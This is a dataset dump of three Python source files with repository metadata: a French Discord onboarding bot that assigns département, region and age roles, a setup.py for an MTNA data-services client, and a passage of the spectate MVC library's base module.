hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b3d0c3d583358469a62183dc3e94d74f4fb738b4 | 19,768 | py | Python | botintegration/main.py | discord-autonomie/PreciousPlasticBot | d0934823d9ef4e9ea268047d100756ba95b0731f | [
"MIT"
] | null | null | null | botintegration/main.py | discord-autonomie/PreciousPlasticBot | d0934823d9ef4e9ea268047d100756ba95b0731f | [
"MIT"
] | null | null | null | botintegration/main.py | discord-autonomie/PreciousPlasticBot | d0934823d9ef4e9ea268047d100756ba95b0731f | [
"MIT"
] | 2 | 2019-09-21T13:36:19.000Z | 2019-10-25T16:28:54.000Z | import asyncio
import discord
import os
import json
import time
from datetime import datetime
from config import get_configuration
departements = json.loads(open("departements.json").read())
regions = json.loads(open("regions.json").read())
async def log(self, guild, message) :
config = get_configuration(guild.id)
with open("logs.txt", "a") as f :
f.write(time.strftime('[%d/%m/%Y %H:%M:%S] ', time.localtime())+guild.name+" : "+message+"\n")
if config["LOG_CHANNEL"] :
channel = discord.utils.find(lambda c: c.name == config["LOG_CHANNEL"], guild.channels)
if channel :
if guild.me.permissions_in(channel).send_messages :
await channel.send(embed=discord.Embed(description=message, color=0x50bdfe))
else :
await contact_modos(self, guild, "Erreur: je n'ai pas la permission d'écrire dans "+channel.mention)
else :
await contact_modos(self, guild, "Erreur: le salon **#"+config["LOG_CHANNEL"]+"** n'existe pas.")
async def contact_modos(self, guild, message):
config = get_configuration(guild.id)
admin = self.get_user(config["ADMIN_ID"])
modo_channel = discord.utils.find(lambda c: c.name == config["MODO_CHANNEL"], guild.channels)
modo_role = discord.utils.find(lambda r: r.name == config["MODO_ROLE"], guild.roles)
if not modo_channel :
await admin.send("\N{WARNING SIGN} Le salon '"+config["MODO_CHANNEL"]+"' n'existe pas, je ne peux plus contacter les modérateurs alors je m'adresse à toi.")
elif not guild.me.permissions_in(modo_channel).send_messages :
modo_channel = None
await admin.send("\N{WARNING SIGN} Je n'ai plus le droit d'écrire dans #"+config["MODO_CHANNEL"]+" du serveur "+guild.name+" donc je ne peux plus contacter les modérateurs donc je m'adresse à toi.")
if modo_channel :
if modo_role :
await modo_channel.send(modo_role.mention+", "+message)
else:
await modo_channel.send("Erreur : je ne peux pas mentionner les modérateurs car le rôle @"+config["MODO_ROLE"]+" a disparu.")
await modo_channel.send(message)
else :
await admin.send(message)
async def refresh_geoloc_list(self, guild):
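# Rebuild the per-département member lists displayed as embeds in the geoloc
# channel: delete messages from other authors and edit any embed whose member
# list has gone stale.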
config = get_configuration(guild.id)
display_channel = discord.utils.find(lambda m: m.name == config["GEOLOC_DISPLAY_CHANNEL"], guild.channels)
if display_channel == None :
await contact_modos(self, guild, "Erreur: je ne peux pas afficher la liste dans *"+config["GEOLOC_DISPLAY_CHANNEL"]+"* car le salon n'existe pas.")
return
elif not guild.me.permissions_in(display_channel).send_messages :
await contact_modos(self, guild, "Erreur: je ne peux pas afficher la liste dans "+display_channel.mention+" car je n'ai pas les permission d'y écrire.")
return
async for message in display_channel.history(limit=len(departements) + 30, oldest_first=True):
if message.author.id != self.user.id :
await message.delete()
continue
if message.content == "": # embed
try :
departement_code = message.embeds[0].title.split(" ")[0]
except AttributeError:
await message.delete()
continue
role = discord.utils.find(lambda r: r.name.startswith(departement_code+" -"), guild.roles)
if not role :
await contact_modos(self, guild, "le rôle **"+departement_code+" - "+departements[departement_code]["name"]+"** n'existe plus !!")
return
if len(role.members) == 0 :
txt = "Personne \N{DISAPPOINTED BUT RELIEVED FACE}"
else :
txt = " | ".join(sorted([str(user) for user in role.members]))
if len(txt) > 2048 :
txt = txt[:2042]+" [...]"
if txt != message.embeds[0].description:
await log(self, guild, "Je modifie la liste **"+departement_code+" - "+departements[departement_code]["name"]+"**")
embed = discord.Embed(title=departement_code+" - "+departements[departement_code]["name"], description=txt, color=0x50bdfe)
await message.edit(embed=embed)
async def set_user_region(self, member, first_time=False, rappel=0, just_wait=False):
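# DM onboarding flow: ask the member for their département number (99 plus a
# flag emoji for non-French members), confirm via check/cross reactions, swap
# in the matching département and région roles, then ask mineur/majeur;
# unanswered prompts escalate through 24h reminders ('rappel') and end in a
# kick after 72h.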
if just_wait:
await log(self, member.guild, "J'attends une réponse de "+member.mention)
else :
if rappel == 0 :
await log(self, member.guild, "Je demande à "+member.mention+" sa région")
else :
await log(self, member.guild, "Je redemande à "+member.mention+" sa région, rappel n°"+str(rappel))
config = get_configuration(member.guild.id)
admin = self.get_user(config["ADMIN_ID"]) # Titou : 499530093539098624
try :
if not just_wait :
if first_time :
await member.send("Salut et bienvenue sur le serveur **"+member.guild.name+"** ! Je suis le robot chargé de l'accueil des nouveaux. Pour pouvoir accéder au serveur tu vas devoir me dire où tu habites et si tu es mineur ou majeur.")
await member.send("Envoie moi le numéro de ton département (99 si tu es étranger) :")
def check(m):
return m.channel.type == discord.ChannelType.private and m.author == member
def checkR(reaction, user):
return user == member and str(reaction.emoji) in reacts
rep = await client.wait_for('message', check=check, timeout=60*60*24)
code = rep.content.upper()
if len(code) == 1 : code = "0"+code
while code not in departements and code != "99" :
await member.send("Je ne connais pas ce numéro. Envoie `99` si tu es étranger sinon voici les numéros de départements français : "+", ".join(sorted(departements.keys())))
rep = await client.wait_for('message', check=check, timeout=60*60*24)
code = rep.content.upper()
if len(code) == 1 : code = "0"+code
if code == "99" :
await member.send("Envoie moi l'émoji correspondant à ton pays :")
try:
rep = await client.wait_for('message', check=check, timeout=60*60*24)
while not rep.content.encode()[0] == 0xf0 or len(rep.content) != 2:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Envoie juste l'émoji, clique sur la petite tête à droite et cherche ton drapeau dans la liste (tu peux taper `flag` dans la barre de recherche).")
rep = await client.wait_for('message', check=check, timeout=60*60*24)
except asyncio.TimeoutError:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je te propose de repartir de zéro. Si vraiment tu galères tu peux contacter "+admin.mention+" qui est l'administrateur.")
await set_user_region(self, member)
return
if rep.content.encode() == b'\xf0\x9f\x87\xab\xf0\x9f\x87\xb7':
await member.send("Si tu es français, il faut m'envoyer le numéro de ton département.")
await set_user_region(self, member)
return
role = discord.utils.find(lambda r: r.name.split(" ")[0]==rep.content, member.guild.roles)
if role == None :
await contact_modos(self, member.guild, "L'utilisateur "+member.mention+" me dit qu'il est étranger mais je ne connais pas son drapeau ("+rep.content+"), je vous laisse voir avec lui et créer le rôle.")
await member.send("Je ne connais pas ce drapeau. J'ai contacté l'équipe de modérateurs ils devraient prendre contact avec toi d'ici 24h.")
return
else :
msg = await member.send("Je vais t'ajouter ce rôle : "+role.name+"\nC'est bien ça ?")
reacts = ["\N{WHITE HEAVY CHECK MARK}", "\N{CROSS MARK}"]
for r in reacts :
await msg.add_reaction(r)
try:
reaction, user = await client.wait_for('reaction_add', timeout=60, check=checkR)
except asyncio.TimeoutError:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je te propose de repartir de zéro. Si vraiment tu galères tu peux contacter "+admin.mention+" qui est l'administrateur.")
await set_user_region(self, member)
return
if str(reaction.emoji) == "\N{CROSS MARK}" :
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je on recommence.")
await set_user_region(self, member)
return
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
else :
departement = departements[code]
region = regions[departement["region_code"]]
txt = "Je vais t'ajouter les rôles suivants :\nDépartement : **"+departement["name"]+"**\nRégion : **"+region["name"]+"**\nUtilise les réactions pour me dire si tu es d'accord."
msg = await member.send(txt)
reacts = ["\N{WHITE HEAVY CHECK MARK}", "\N{CROSS MARK}"]
for r in reacts :
await msg.add_reaction(r)
try:
reaction, user = await client.wait_for('reaction_add', timeout=60, check=checkR)
except asyncio.TimeoutError:
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je te propose de repartir de zéro. Si vraiment tu galères tu peux contacter "+admin.mention+" qui est l'administrateur.")
await set_user_region(self, member)
return
if str(reaction.emoji) == "\N{CROSS MARK}" :
await contact_modos(self, member.guild, member.mention+" a l'air de galérer avec avec l'ajout de rôle, vous pouvez peut-être voir pour l'aider si dans quelques minutes il n'a toujours pas de rôle")
await member.send("Bon OK je on recommence.")
await set_user_region(self, member)
return
async with member.typing():
for role in member.roles :
if role.color.to_rgb() == config["REGION_ROLE_COLOR"] :
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
if role.color.to_rgb() == config["DEPARTEMENT_ROLE_COLOR"]:
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
await refresh_geoloc_list(self, member.guild)
role = discord.utils.find(lambda r: r.name.startswith(code+" -"), member.guild.roles)
if role == None :
await contact_modos(self, member.guild, "Erreur, je n'ai pas pu ajouter le rôle **"+code+" - "+departement["name"]+"** à "+member.mention+" car le rôle ne semble pas exister.")
return
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
await refresh_geoloc_list(self, member.guild)
role = discord.utils.get(member.guild.roles, name=region["name"])
if role == None:
await contact_modos(self, member.guild, "Erreur, je n'ai pas pu ajouter le rôle *"+region["name"]+"* à "+member.mention+" car le rôle ne semble pas exister.")
return
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
if config["REMOVE_NEWUSER_ROLE"] :
role = discord.utils.get(member.guild.roles, name=config["NEWUSER_ROLE_NAME"])
if role == None :
await contact_modos(self, member.guild, "Erreur: le rôle "+config["NEWUSER_ROLE_NAME"]+" n'existe plus ou a changé de nom")
return
if role in member.roles :
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
await member.send("OK maintenant écris moi `mineur` si tu as moins de 18 ans et `majeur` si tu as 18 ans ou plus :")
rep = await client.wait_for('message', check=check, timeout=60*60*24)
while rep.content.lower() != "mineur" and rep.content.lower() != "majeur" :
await member.send("Je n'ai pas compris tu peux juste écrire `mineur` ou `majeur` stp.")
rep = await client.wait_for('message', check=check, timeout=60*60*24)
role = discord.utils.get(member.guild.roles, name=config["YOUNG_ROLE_NAME"])
if role == None :
await contact_modos(self, member.guild, "Erreur, je n'ai pas pu ajouter le rôle *"+config["YOUNG_ROLE_NAME"]+"* à "+member.mention+" car le rôle ne semble pas exister.")
return
if rep.content.lower() == "mineur" :
await member.add_roles(role)
await log(self, member.guild, "J'ajoute le rôle "+role.mention+" à "+member.mention)
elif role in member.roles :
await member.remove_roles(role)
await log(self, member.guild, "J'enlève le rôle "+role.mention+" à "+member.mention)
confirmedRole = discord.utils.get(member.guild.roles, name=config["CONFIRMED_ROLE_NAME"])
if not confirmedRole :
await contact_modos(self, member.guild, "Erreur: le rôle "+config["CONFIRMED_ROLE_NAME"]+" n'existe plus donc je ne peux plus le donner...")
return
else :
if not confirmedRole in member.roles :
await member.add_roles(confirmedRole)
await log(self, member.guild, "J'ajoute le rôle "+confirmedRole.mention+" à "+member.mention)
if config["WELCOME_ANOUNCE"] :
chan = discord.utils.get(member.guild.channels, name=config["WELCOME_CHANNEL"])
if chan :
await chan.send("Bienvenue à "+member.mention)
else :
await contact_modos(self, member.guild, "Erreur: le salon **"+config["WELCOME_CHANNEL"]+"** n'existe pas pour dire bienvenue.")
return
await member.send("C'est tout bon, tu peux accéder au serveur !")
except asyncio.TimeoutError :
if config["NEWUSER_ROLE_NAME"] in [r.name for r in member.roles] :
if rappel == 0 :
await member.send("Désolé de te déranger mais ça fait 24h que tu ne m'as pas répondu. Il faut obligatoirement répondre à ces questions pour accéder au serveur. Ceci est le premier rappel. **Si je n'ai pas de réponse dans 48h tu seras exclu du serveur.**")
await set_user_region(self, member, rappel=1)
if rappel == 1 :
await member.send("Désolé de te déranger à nouveau mais ça fait 24h que tu ne m'as pas répondu. Il faut obligatoirement répondre à ces questions pour accéder au serveur. Ceci est le deuxième rappel. **Si je n'ai pas de réponse dans 24h tu seras exclu de ce serveur.**")
await set_user_region(self, member, rappel=2)
if rappel == 2 :
await member.send("Cela fait 72h que tu as rejoint le serveur et tu n'as toujours pas répondu aux questions. Je vais donc t'exclure. Tu pourras néanmoins rejoindre le serveur à nouveau avec un lien d'invitation.")
await member.kick(reason="Pas de réponses aux questions d'accueil durant 72h.")
await log(self, member.guild, "J'ai exclu "+member.mention+" après 72h sans réponse.")
except discord.Forbidden :
await contact_modos(self, member.guild, "Je n'ai pas la permission de contacter "+member.mention+" par MP, merci de gérer ses rôles manuellement.")
class MyClient(discord.Client):
async def on_ready(self):
for guild in self.guilds:
await log(self, guild, "Je viens de redémarrer.")
config = get_configuration(guild.id)
if config["RUN_SYNC_ON_STARTUP"]:
for member in guild.members :
if config["NEWUSER_ROLE_NAME"] in [role.name for role in member.roles] :
h = (datetime.now() - member.joined_at).total_seconds()/60/60
if h >= 72 :
await member.kick(reason="Pas de signes de vie depuis "+str(int(h/24))+" jours")
await log(self, member.guild, "J'expulse "+member.mention)
else:
asyncio.ensure_future(set_user_region(self, member, rappel=int(h/24), just_wait=True))
await refresh_geoloc_list(self, guild)
async def on_message(self, message):
config = None
if message.guild:
config = get_configuration(message.guild.id)
if config:
geoloc_command = config["GEOLOC_COMMAND_NAME"]
if message.content.startswith(geoloc_command):
await set_user_region(self, message.author)
if config["REMOVE_GEOLOCS_MESSAGES"]:
await message.delete()
async def on_member_join(self, member):
config = get_configuration(member.guild.id)
if config["ADD_NEWUSER_ROLE"] :
role = discord.utils.get(member.guild.roles, name=config["NEWUSER_ROLE_NAME"])
if role :
if not role in member.roles :
await member.add_roles(role)
else :
await contact_modos(self, member.guild, "Ereur: le rôle "+config["NEWUSER_ROLE_NAME"]+" n'existe plus ou a changé de nom.")
await set_user_region(self, member, first_time=True)
async def on_member_remove(self, member):
config = get_configuration(member.guild.id)
if config["GOODBYE_ANOUNCE"] :
chan = discord.utils.get(member.guild.channels, name=config["GOODBYE_CHANNEL"])
if chan :
await chan.send("Au revoir "+member.mention)
else :
await contact_modos(self, member.guild, "Erreur: le salon **"+config["GOODBYE_CHANNEL"]+"** n'existe pas pour dire au revoir.")
intents = discord.Intents.default()
intents.members = True
client = MyClient(intents=intents)
if "DISCORD_TOKEN" in os.environ:
client.run(os.environ["DISCORD_TOKEN"])
else:
print("Missing DISCORD_TOKEN environment variable")
| 53.86376 | 285 | 0.610633 | 2,616 | 19,768 | 4.539373 | 0.15711 | 0.041684 | 0.040421 | 0.037137 | 0.598232 | 0.551158 | 0.484632 | 0.450274 | 0.420042 | 0.381389 | 0 | 0.009937 | 0.282173 | 19,768 | 366 | 286 | 54.010929 | 0.82685 | 0.001669 | 0 | 0.423077 | 0 | 0.052448 | 0.29404 | 0.006132 | 0 | 0 | 0.001014 | 0 | 0 | 1 | 0.006993 | false | 0 | 0.024476 | 0.006993 | 0.097902 | 0.003497 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d1fe94baad9d15458d5ff9000e994472945459 | 1,062 | py | Python | setup.py | mtna/rds-python | 961ea12fc70a35c8b979855c8f20a803a9d2f596 | [
"Apache-2.0"
] | 3 | 2020-05-15T17:31:18.000Z | 2021-05-05T09:21:24.000Z | setup.py | mtna/rds-python | 961ea12fc70a35c8b979855c8f20a803a9d2f596 | [
"Apache-2.0"
] | null | null | null | setup.py | mtna/rds-python | 961ea12fc70a35c8b979855c8f20a803a9d2f596 | [
"Apache-2.0"
] | 2 | 2020-06-04T09:01:35.000Z | 2021-04-22T14:49:36.000Z | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="mtna-rds",
version="0.2.16",
author="Metadata Technology North America Inc.",
author_email="mtna@mtna.us",
description="A library to query the Rich Data Services API framework developed by MTNA",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/mtna/rds-python/",
packages=setuptools.find_packages(),
classifiers=[
"Topic :: Database :: Database Engines/Servers",
"Natural Language :: English",
"Development Status :: 3 - Alpha",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, <4'
)
| 36.62069 | 92 | 0.620527 | 128 | 1,062 | 5.078125 | 0.625 | 0.092308 | 0.153846 | 0.12 | 0.083077 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033493 | 0.212806 | 1,062 | 28 | 93 | 37.928571 | 0.744019 | 0 | 0 | 0 | 0 | 0.038462 | 0.55838 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d58035864fec3162d63e3f38f884692d40a888 | 13,575 | py | Python | spectate/mvc/base.py | agoose77/spectate | a70d8e3fb8e9e3f053cb2a1c5a4c760df0d61cb3 | [
"MIT"
] | null | null | null | spectate/mvc/base.py | agoose77/spectate | a70d8e3fb8e9e3f053cb2a1c5a4c760df0d61cb3 | [
"MIT"
] | null | null | null | spectate/mvc/base.py | agoose77/spectate | a70d8e3fb8e9e3f053cb2a1c5a4c760df0d61cb3 | [
"MIT"
] | null | null | null | # See End Of File For Licensing
from inspect import signature
from functools import wraps
from typing import Union, Callable, Optional
from contextlib import contextmanager
from weakref import WeakValueDictionary
from spectate.core import Watchable, watched, Immutable, MethodSpectator
from .utils import members
__all__ = ["Model", "Control", "view", "unview", "views", "link", "unlink", "notifier"]
def views(model: "Model") -> list:
"""Return a model's views keyed on what events they respond to.
Model views are added by calling :func:`view` on a model.
"""
if not isinstance(model, Model):
raise TypeError("Expected a Model, not %r." % model)
return model._model_views[:]
def view(model: "Model", *functions: Callable) -> Optional[Callable]:
"""A decorator for registering a callback to a model
Parameters:
model: the model object whose changes the callback should respond to.
Examples:
.. code-block:: python
from spectate import mvc
items = mvc.List()
@mvc.view(items)
def printer(items, events):
for e in events:
print(e)
items.append(1)
"""
if not isinstance(model, Model):
raise TypeError("Expected a Model, notself._model_notifier() %r." % model)
def setup(function: Callable):
model._attach_model_view(function)
return function
if functions:
for f in functions:
setup(f)
else:
return setup
def unview(model: "Model", function: Callable):
"""Remove a view callbcak from a model.
Parameters:
model: The model which contains the view function.
function: The callable which was registered to the model as a view.
Raises:
ValueError: If the given ``function`` is not a view of the given ``model``.
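Examples:
.. code-block:: python
# a minimal sketch, continuing the ``items``/``printer`` example from :func:`view`
mvc.unview(items, printer)
items.append(2)  # printer is no longer called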
"""
model._remove_model_view(function)
def link(source, *targets):
"""Attach all of the source's present and future view functions to the targets.
Parameters:
source: The model whose view functions will be attached to the targets.
targets: The models that will acquire the source's view functions.
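Examples:
.. code-block:: python
from spectate import mvc
# a minimal sketch; views attached to ``outer`` also observe ``inner``
outer, inner = mvc.List(), mvc.List()
mvc.link(outer, inner)
@mvc.view(outer)
def printer(model, events):
for e in events:
print(e)
inner.append(1)  # printer fires because inner shares outer's views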
"""
for t in targets:
source._attach_child_model(t)
def unlink(source, *targets):
"""Remove all of the source's present and future view functions from the targets.
Parameters:
source: The model whose view functions will be removed from the targets.
targets: The models that will no longer share view functions with the source.
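Examples:
.. code-block:: python
# a minimal sketch, continuing the :func:`link` example
mvc.unlink(outer, inner)
inner.append(2)  # printer is no longer notified for inner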
"""
for t in targets:
source._remove_child_model(t)
@contextmanager
def notifier(model):
"""Manually send notifications to the given model.
Parameters:
model: The model whose views will recieve notifications
Returns:
A function whose keyword arguments become event data.
Example:
.. code-block:: python
m = Model()
@view(m)
def printer(m, events):
for e in events:
print(e)
with notifier(m) as notify:
# the view should print out this event
notify(x=1, y=2)
"""
events = []
def notify(*args, **kwargs):
events.append(Immutable(*args, **kwargs))
yield notify
if events:
model._notify_model_views(events)
class Control:
"""An object used to define control methods on a :class:`Model`
A "control" method on a :class:`Model` is one which reacts to another method being
called. For example there is a control method on the
:class:`~spectate.mvc.models.List`
which responds when :meth:`~spectate.mvc.models.List.append` is called.
A control method is a slightly modified :ref:`beforeback <Spectator Beforebacks>` or
:ref:`afterback <Spectator Afterbacks>` that accepts an extra ``notify`` argument.
These are added to a control object by calling :meth:`Control.before` or
:meth:`Control.after` respectively. The ``notify`` arugment is a function which
allows a control method to send messages to :func:`views <view>` that are registered
to a :class:`Model`.
Parameters:
methods:
The names of the methods on the model which this control will react to
when they are called. This is either a comma-separated
string, or a list of strings.
before:
A control method that reacts before any of the given ``methods`` are
called. If given as a callable, then that function will be used as the
callback. If given as a string, then the control will look up a method
with that name when reacting (useful when subclassing).
after:
A control method that reacts after any of the given ``methods`` are
called. If given as a callable, then that function will be used as the
callback. If given as a string, then the control will look up a method
with that name when reacting (useful when subclassing).
Examples:
Control methods are registered to a :class:`Control` with a ``str`` or function.
A string may refer to the name of a method on a `Model` while a function should
be decorated under the same name as the :class:`Control` object to preserve the
namespace.
.. code-block:: python
from spectate import mvc
class X(mvc.Model):
_control_method = mvc.Control("method").before("_control_before_method")
def _control_before_method(self, call, notify):
print("before")
# Note how the method uses the same name. It
# would be redundant to use a different one.
@_control_method.after
def _control_method(self, answer, notify):
print("after")
def method(self):
print("during")
x = X()
x.method()
.. code-block:: text
before
during
after
"""
def __init__(
self,
methods: Union[list, tuple, str],
*,
before: Union[Callable, str] = None,
after: Union[Callable, str] = None,
):
if isinstance(methods, (list, tuple)):
self.methods = tuple(methods)
elif isinstance(methods, str):
self.methods = tuple(map(str.strip, methods.split(",")))
else:
raise ValueError("methods must be a string of list of strings")
self.name = None
if isinstance(before, Control):
before = before._before
self._before = before
if isinstance(after, Control):
after = after._after
self._after = after
def __get__(self, obj, cls):
if obj is None:
return self
else:
return BoundControl(obj, self)
def __set_name__(self, cls, name):
if not issubclass(cls, Model):
raise TypeError("Can only define a control on a Model, not %r" % cls)
if self.name:
msg = "Control was defined twice - %r and %r."
raise RuntimeError(msg % (self.name, name))
else:
self.name = name
for m in self.methods:
setattr(cls, m, MethodSpectator(getattr(cls, m), m))
class BoundControl:
def __init__(self, obj, ctrl):
self._obj = obj
self._cls = type(obj)
self._name = ctrl.name
self._before = ctrl._before
self._after = ctrl._after
self.methods = ctrl.methods
@property
def before(self):
if self._before is None:
method_name = self._name + "_before"
if hasattr(self._obj, method_name):
before = getattr(self._obj, method_name)
else:
return None
else:
before = self._before
if isinstance(before, str):
before = getattr(self._obj, before)
elif hasattr(before, "__get__"):
before = before.__get__(self._obj, type(self._obj))
@wraps(before)
def beforeback(value, call):
def parameters():
meth = getattr(value, call.name)
bound = signature(meth).bind(*call.args, **call.kwargs)
return dict(bound.arguments)
with notifier(value) as notify:
return before(call + {"parameters": parameters}, notify)
return beforeback
@property
def after(self):
if self._after is None:
return None
else:
after = self._after
if isinstance(after, str):
after = getattr(self._obj, after)
elif hasattr(after, "__get__"):
after = after.__get__(self._obj, type(self._obj))
@wraps(after)
def afterback(value, answer):
with notifier(value) as notify:
return after(answer, notify)
return afterback
class Model(Watchable):
"""An object that can be :class:`controlled <Control>` and :func:`viewed <view>`.
Users should define :class:`Control` methods and then :func:`view` the change
events those controls emit. This process starts by defining controls on a subclass
of :class:`Model`.
Examples:
.. code-block:: python
from specate import mvc
class Object(Model):
_control_attr_change = Control(
"__setattr__, __delattr__",
before="_control_before_attr_change",
after="_control_after_attr_change",
)
def __init__(self, *args, **kwargs):
for k, v in dict(*args, **kwargs).items():
setattr(self, k, v)
def _control_before_attr_change(self, call, notify):
return call.args[0], getattr(self, call.args[0], Undefined)
def _control_after_attr_change(self, answer, notify):
attr, old = answer.before
new = getattr(self, attr, Undefined)
if new != old:
notify(attr=attr, old=old, new=new)
o = Object()
@mvc.view(o)
def printer(o, events):
for e in events:
print(e)
o.a = 1
o.b = 2
.. code-block:: text
